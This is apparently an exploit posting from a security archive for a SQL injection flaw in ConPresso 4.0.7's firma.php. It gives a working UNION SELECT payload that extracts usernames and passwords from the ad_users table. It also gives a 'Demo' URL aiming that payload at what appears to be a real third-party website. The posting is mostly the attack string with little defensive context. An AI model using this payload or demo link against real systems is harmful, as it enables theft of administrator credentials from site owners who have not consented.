ConPresso version 4.0.7 suffers from a remote SQL injection vulnerability.
7590843d82340be9639acd44162259f2352d408b75a73bd94961329eac53b937ConPresso 4.0.7 SQL Injection Vulnerability
###########################
Author : Gamoscu
Homepage : http://www.1923turk.com
Blog : http://gamoscu.wordpress.com/
Script : ConPresso 4.0.7
Download : http://www.conpresso.de/conpresso/de_downloads/index.php?rubric=Download
###########################
[ Vulnerable File ]
firma.php?id= [ SQL ]
[ XpL ]
-1/**/union/**/all/**/select/**/1,concat_ws(0x3a,password,username),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+ad_users
[ Demo]
http://www.get-it-gay.at/portfolio/firma.php?id=-1/**/union/**/all/**/select/**/1,concat_ws(0x3a,password,username),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+ad_users
iyi ki dogdun DELiBEY
##############################################################
# Greetz: Manas58 - Baybora - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO
##############################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed